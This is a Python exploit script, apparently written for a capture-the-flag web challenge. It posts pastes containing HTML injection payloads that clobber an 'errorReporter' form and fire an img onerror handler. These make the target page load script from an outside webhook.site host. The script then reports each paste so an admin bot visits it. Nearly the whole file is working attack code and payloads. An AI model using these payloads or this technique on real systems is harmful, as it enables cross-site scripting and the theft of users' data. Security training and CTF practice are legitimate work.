import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# First, verify the exact working payload still works
test1 = '''<form id="errorReporter"><input name="path" value="//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/baseline.js"></form>
<img src=x onerror="window.lastRenderError='x';throw Error()">'''

# Test with static data embedded
test2 = '''<form id="errorReporter"><input name="path" value="//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/static.js?test=HELLO"></form>
<img src=x onerror="window.lastRenderError='x';throw Error()">'''

# Test if we can read the value from the input itself via the script tag
test3 = '''<form id="errorReporter"><input name="path" value="//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/test3.js?value="></form>
<img src=x onerror="window.lastRenderError='x';throw Error()">'''

print("[*] Testing simpler variations...")
print()

tests = [
    ("Baseline - empty URL", test1),
    ("Static data in URL", test2),
    ("Test 3 - value param", test3),
]

for name, payload in tests:
    print(f"[*] Creating: {name}")
    
    session = requests.Session()
    resp = session.post(
        f"{BASE_URL}/note/new",
        data={"title": name, "body": payload},
        allow_redirects=False
    )
    
    if resp.status_code == 302:
        location = resp.headers.get('Location')
        note_url = f"{BASE_URL}{location}"
        print(f"    URL: {note_url}")
        
        report = session.post(f"{BASE_URL}/report", data={"url": location})
        print(f"    Reported: {report.status_code == 202}")
    print()

print("[*] Check webhook in 40 seconds:")
print("    https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
print()
print("[*] Expected requests:")
print("    - /baseline.js (should work)")
print("    - /static.js?test=HELLO (should work if URL params allowed)")
print("    - /test3.js?value= (should work)")